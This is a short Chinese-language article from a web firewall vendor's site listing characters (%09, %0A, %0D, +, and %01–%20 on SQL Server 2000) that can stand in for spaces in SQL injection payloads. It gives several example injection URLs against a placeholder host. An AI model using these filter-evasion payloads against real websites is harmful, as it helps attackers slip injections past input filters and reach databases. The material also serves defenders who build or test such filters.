SQL注入中可以替换空格的字符

		English
		电子信箱
		加入收藏

威盾防火墙 >> 新闻中心 >> 威盾新闻 >> SQL注入中可以替换空格的字符


SQL注入中可以替换空格的字符
威盾防火墙 2014-12-05

默认是：　　http://www.xxx.com/shownotice.asp?id=78 and 1=1 　　实际上用%09 %0A %0D +都可以替代空格　　例如：　　http://www.xxx.com/shownotice.asp?id=78%09and%091=1 　　http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1 　　http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1 　　http://www.xxx.com/shownotice.asp?id=78%+and+1=1 　　以下可以在SQLServer2000下可以替换%01到%20都可以　　http://www.xxx.com/shownotice.asp?id=78%19and%191=1

相关内容：	最新内容：
php防止sql注入攻击的简单代码[2014-12-05] 解析阻止或减轻SQL注入攻击实用招数[2014-12-05] 对JSP防范SQL注入攻击的描述[2014-12-05] 详解PHP防范SQL注入的具体方法[2014-12-05] Web攻防系列教程之 PHP + Mysql注入攻防实战[2014-12-05] php is_numberic函数造成的SQL注入漏洞[2014-12-05]	php防止sql注入攻击的简单代码[2014-12-05] 别让恶意软件妨碍我们的生活[2014-12-05] 浅析黑客技术和网络安全[2014-12-05] 网站安全应用服务解决方案概述[2014-12-05] 层次化防御保证企业门户网站安全[2014-12-05] 网站安全分析以及被黑处理[2014-12-05]

(C)2005-2016 威盾IIS防火墙 www.WeiDun.com.cn 版权所有

电话：(010)51661195 QQ支持:2600725

京ICP备09032906号